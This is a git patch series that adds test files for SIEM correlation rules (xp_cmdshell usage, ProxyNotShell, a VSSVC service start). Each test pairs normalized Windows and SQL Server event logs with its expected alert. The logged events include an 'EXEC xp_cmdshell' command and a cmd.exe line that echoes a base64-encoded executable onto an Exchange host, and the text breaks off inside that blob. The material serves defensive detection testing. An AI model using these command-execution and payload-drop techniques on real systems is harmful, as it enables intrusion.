"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-05T08:46:55.3985456Z\"},\"EventRecordID\":\"46944136\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3448\",\"ThreadID\":\"4816\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"win10-work.stand2008.local\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"-\"},{\"Name\":\"UtcTime\",\"text\":\"2023-06-05 08:46:55.323\"},{\"Name\":\"ProcessGuid\",\"text\":\"{2b856446-a0ff-647d-4503-00000000ba00}\"},{\"Name\":\"ProcessId\",\"text\":\"2568\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\VSSVC.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.19041.1741 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Microsoft® Volume Shadow Copy Service\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"VSSVC.EXE\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\vssvc.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\СИСТЕМА\"},{\"Name\":\"LogonGuid\",\"text\":\"{2b856446-79f9-647d-e703-000000000000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"MD5=875046AD4755396636A68F4A9EDB22A4,SHA256=82459B7D6CEEFF22E6E81CA445F9134C3EE917BDC3DF185700813F23AC7DB77E,IMPHASH=0BF1B64AF19D0AFACCB000F015F48095\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{2b856446-79f8-647d-0b00-00000000ba00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"836\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"},{\"Name\":\"ParentUser\",\"text\":\"NT AUTHORITY\\\\СИСТЕМА\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "2b856446-79f9-647d-e703-000000000000", "event_src.category": "Other", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:система@nt authority", "object.account.name": "система", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\vssvc.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\vssvc.exe", "object.process.guid": "2b856446-a0ff-647d-4503-00000000ba00", "object.process.hash.imphash": "0BF1B64AF19D0AFACCB000F015F48095", "object.process.hash.md5": "875046AD4755396636A68F4A9EDB22A4", "object.process.hash.sha256": "82459B7D6CEEFF22E6E81CA445F9134C3EE917BDC3DF185700813F23AC7DB77E", "object.process.id": "2568", "object.process.meta": "Description:Microsoft® Volume Shadow Copy Service | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "vssvc.exe", "object.process.original_name": "VSSVC.EXE", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "2b856446-79f8-647d-0b00-00000000ba00", "object.process.parent.id": "836", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.19041.1741 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T09:52:59.463Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:система@nt authority", "subject.account.name": "система", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-05T08:46:55.323Z", "type": "raw", "uuid": "c26f2f41-0876-4ccc-87b1-367e5ffe3843"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Execution", "category.low": "System Services: Service Execution", "correlation_name": "VSSVC_service_state_changed", "correlation_type": "event", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "VSSVC_service_state_changed|win10-work.stand2008.local", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "service", "object.account.domain": "nt authority", "object.account.id": "synthetic:система@nt authority", "object.account.name": "система", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\vssvc.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\vssvc.exe", "object.process.guid": "2b856446-a0ff-647d-4503-00000000ba00", "object.process.hash.md5": "875046AD4755396636A68F4A9EDB22A4", "object.process.hash.sha256": "82459B7D6CEEFF22E6E81CA445F9134C3EE917BDC3DF185700813F23AC7DB77E", "object.process.id": "2568", "object.process.meta": "Description:Microsoft® Volume Shadow Copy Service | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "vssvc.exe", "object.process.original_name": "VSSVC.EXE", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "2b856446-79f8-647d-0b00-00000000ba00", "object.process.parent.id": "836", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.19041.1741 (WinBuild.160101.0800)", "reason": "|Service execution", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:система@nt authority", "subject.account.name": "система", "subject.account.privileges": "System", "subject.account.session_id": "999"} \ No newline at end of file From efa885f808b9d2d802bc4126b85949dd9bb47429 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 10:53:57 +0300 Subject: [PATCH 36/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(XP=5FCmdshell=5FUsage)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../mitre_attck_execution/XP_Cmdshell_Usage/tests/test_1.sc | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_execution/XP_Cmdshell_Usage/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_execution/XP_Cmdshell_Usage/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_execution/XP_Cmdshell_Usage/tests/test_1.sc new file mode 100644 index 00000000..43da6603 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_execution/XP_Cmdshell_Usage/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "execute", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"MSSQLSERVER\"},\"EventID\":{\"text\":\"33205\",\"Qualifiers\":\"16384\"},\"Level\":\"0\",\"Task\":\"5\",\"Keywords\":\"0xa0000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-01-31T14:18:25.292649100Z\"},\"EventRecordID\":\"1894\",\"Channel\":\"Application\",\"Computer\":\"DESKTOP-GB13G7P\",\"Security\":null},\"EventData\":{\"Data\":\"audit_schema_version:1\\nevent_time:2020-01-31 14:18:24.2931884\\nsequence_number:1\\naction_id:EX \\nsucceeded:true\\nis_column_permission:false\\nsession_id:57\\nserver_principal_id:268\\ndatabase_principal_id:1\\ntarget_server_principal_id:0\\ntarget_database_principal_id:0\\nobject_id:-1008137134\\nuser_defined_event_id:0\\ntransaction_id:54619\\nclass_type:X \\npermission_bitmask:00000000000000000000000000000020\\nsequence_group_id:855307DD-33F9-4781-BC23-94C72CCD8460\\nsession_server_principal_name:Analysis\\nserver_principal_name:Analysis\\nserver_principal_sid:5c9dc62711b2c84695fc5132e3a852db\\ndatabase_principal_name:dbo\\ntarget_server_principal_name:\\ntarget_server_principal_sid:\\ntarget_database_principal_name:\\nserver_instance_name:DESKTOP-GB13G7P\\ndatabase_name:master\\nschema_name:sys\\nobject_name:xp_cmdshell\\nstatement:EXEC xp_cmdshell 'ipconfig'\\nadditional_information:\\nuser_defined_information:\\n\"}}}", "datafield1": "EXEC xp_cmdshell 'ipconfig'", "datafield2": "DESKTOP-GB13G7P", "datafield3": "master", "datafield4": "EX", "datafield5": "X", "datafield8": "ipconfig", "event_src.category": "Database server", "event_src.fqdn": "desktop-gb13g7p", "event_src.host": "desktop-gb13g7p", "event_src.hostname": "desktop-gb13g7p", "event_src.subsys": "Application", "event_src.title": "sql_server", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_SQL_Server_eventlog_33205_audit_exec_used", "importance": "high", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "33205", "normalized": true, "object": "command", "object.property": "command name", "object.query": "EXEC xp_cmdshell 'ipconfig'", "object.type": "commandline payload", "object.value": "xp_cmdshell", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T12:18:11.012Z", "status": "success", "subject": "account", "subject.account.id": "5c9dc62711b2c84695fc5132e3a852db", "subject.account.name": "analysis", "subject.id": "5c9dc62711b2c84695fc5132e3a852db", "subject.name": "analysis", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-01-31T14:18:24.293Z", "type": "raw", "uuid": "558a6586-c704-44f4-a03e-e4cdb5321652"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "execute", "alert.context": "ipconfig", "alert.key": "EXEC xp_cmdshell 'ipconfig'", "category.generic": "Attack", "category.high": "Execution", "category.low": "Command-Line Interface", "correlation_name": "XP_Cmdshell_Usage", "correlation_type": "event", "datafield1": "EXEC xp_cmdshell 'ipconfig'", "datafield2": "DESKTOP-GB13G7P", "datafield3": "master", "datafield4": "EX", "datafield5": "X", "datafield8": "ipconfig", "event_src.category": "Database server", "event_src.fqdn": "desktop-gb13g7p", "event_src.host": "desktop-gb13g7p", "event_src.hostname": "desktop-gb13g7p", "event_src.subsys": "Application", "event_src.title": "sql_server", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "XP_Cmdshell_Usage|desktop-gb13g7p|5c9dc62711b2c84695fc5132e3a852db", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "command", "object.property": "command name", "object.query": "EXEC xp_cmdshell 'ipconfig'", "object.type": "commandline payload", "object.value": "xp_cmdshell", "status": "success", "subject": "account", "subject.account.id": "5c9dc62711b2c84695fc5132e3a852db", "subject.account.name": "analysis"} From a0b9b20acf18175fdf192ca8c6141eeab977de1f Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 11:12:09 +0300 Subject: [PATCH 37/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(ProxyNot?= =?UTF-8?q?Shell:)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../ProxyNotShell/tests/test_1.sc | 6 ++++++ .../ProxyNotShell/tests/test_2.sc | 6 ++++++ 2 files changed, 12 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_initial_access/ProxyNotShell/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_initial_access/ProxyNotShell/tests/test_2.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_initial_access/ProxyNotShell/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_initial_access/ProxyNotShell/tests/test_1.sc new file mode 100644 index 00000000..9085fcdb --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_initial_access/ProxyNotShell/tests/test_1.sc @@ -0,0 +1,6 @@ +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4624\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"12544\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-03-29T12:26:10.023279300Z\"},\"EventRecordID\":\"8695760\",\"Correlation\":{\"ActivityID\":\"{4f904282-5ce1-0000-b842-904fe15cd901}\"},\"Execution\":{\"ProcessID\":\"620\",\"ThreadID\":\"19016\"},\"Channel\":\"Security\",\"Computer\":\"exchange.example.com\",\"Security\":null},\"EventData\":{\"Data\":[{\"text\":\"S-1-0-0\",\"Name\":\"SubjectUserSid\"},{\"text\":\"-\",\"Name\":\"SubjectUserName\"},{\"text\":\"-\",\"Name\":\"SubjectDomainName\"},{\"text\":\"0x0\",\"Name\":\"SubjectLogonId\"},{\"text\":\"S-1-5-21-1999687082-732736654-454791560-1114\",\"Name\":\"TargetUserSid\"},{\"text\":\"k_ivanov\",\"Name\":\"TargetUserName\"},{\"text\":\"example\",\"Name\":\"TargetDomainName\"},{\"text\":\"0x34ac298b\",\"Name\":\"TargetLogonId\"},{\"text\":\"3\",\"Name\":\"LogonType\"},{\"text\":\"NtLmSsp \",\"Name\":\"LogonProcessName\"},{\"text\":\"NTLM\",\"Name\":\"AuthenticationPackageName\"},{\"text\":\"rhangnsivabVi\",\"Name\":\"WorkstationName\"},{\"text\":\"{00000000-0000-0000-0000-000000000000}\",\"Name\":\"LogonGuid\"},{\"text\":\"-\",\"Name\":\"TransmittedServices\"},{\"text\":\"NTLM V2\",\"Name\":\"LmPackageName\"},{\"text\":\"128\",\"Name\":\"KeyLength\"},{\"text\":\"0x0\",\"Name\":\"ProcessId\"},{\"text\":\"-\",\"Name\":\"ProcessName\"},{\"text\":\"10.155.1.6\",\"Name\":\"IpAddress\"},{\"text\":\"45342\",\"Name\":\"IpPort\"},{\"text\":\"%%1833\",\"Name\":\"ImpersonationLevel\"},{\"text\":\"-\",\"Name\":\"RestrictedAdminMode\"},{\"text\":\"-\",\"Name\":\"TargetOutboundUserName\"},{\"text\":\"-\",\"Name\":\"TargetOutboundDomainName\"},{\"text\":\"%%1843\",\"Name\":\"VirtualAccount\"},{\"text\":\"0x0\",\"Name\":\"TargetLinkedLogonId\"},{\"text\":\"%%1843\",\"Name\":\"ElevatedToken\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "chain_id": "4f904282-5ce1-0000-b842-904fe15cd901", "datafield6": "Network", "datafield9": "NTLM", "dst.fqdn": "exchange.example.com", "dst.host": "exchange.example.com", "dst.hostname": "exchange", "event_src.category": "AAA", "event_src.fqdn": "exchange.example.com", "event_src.host": "exchange.example.com", "event_src.hostname": "exchange", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4624_An_account_was_successfully_logged_on", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_auth_method": "remote", "logon_service": "NtLmSsp", "logon_type": 3, "mime": "application/x-pt-eventlog", "msgid": "4624", "normalized": true, "object": "system", "object.property": "session ID with ElevatedToken", "object.value": "0", "recv_ipv4": "127.0.0.1", "recv_time": "2023-04-03T09:59:22.529Z", "src.host": "rhangnsivabvi", "src.hostname": "rhangnsivabvi", "src.ip": "10.155.1.6", "src.port": 45342, "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1999687082-732736654-454791560-1114", "subject.account.name": "k_ivanov", "subject.account.privileges": "local user rights", "subject.account.session_id": "883698059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-03-29T12:26:10.023Z", "type": "raw", "uuid": "093da62a-7657-4bf6-8ae1-bec6f1e0b7a8"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-03-29T12:26:08.950218800Z\"},\"EventRecordID\":\"6959898\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"3184\",\"ThreadID\":\"4760\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"exchange.example.com\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"-\",\"Name\":\"RuleName\"},{\"text\":\"2023-03-29 12:26:08.946\",\"Name\":\"UtcTime\"},{\"text\":\"{d5e182b9-2e60-6424-c625-000000002700}\",\"Name\":\"ProcessGuid\"},{\"text\":\"2276\",\"Name\":\"ProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"Name\":\"Image\"},{\"text\":\"10.0.17763.1697 (WinBuild.160101.0800)\",\"Name\":\"FileVersion\"},{\"text\":\"Windows Command Processor\",\"Name\":\"Description\"},{\"text\":\"Microsoft® Windows® Operating System\",\"Name\":\"Product\"},{\"text\":\"Microsoft Corporation\",\"Name\":\"Company\"},{\"text\":\"Cmd.Exe\",\"Name\":\"OriginalFileName\"},{\"text\":\"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\" /c echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAeGg3SgAAAAAAAAAA4AAPAQsBBgAAsAAAAKAAAAAAAABqtgAAABAAAADAAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAGABAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAbMcAAHgAAAAAUAEAyAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAODBAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAADgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABmqQAAABAAAACwAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5g8AAADAAAAAEAAAAMAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAFxwAAAA0AAAAEAAAADQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADIBwAAAFABAAAQAAAAEAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA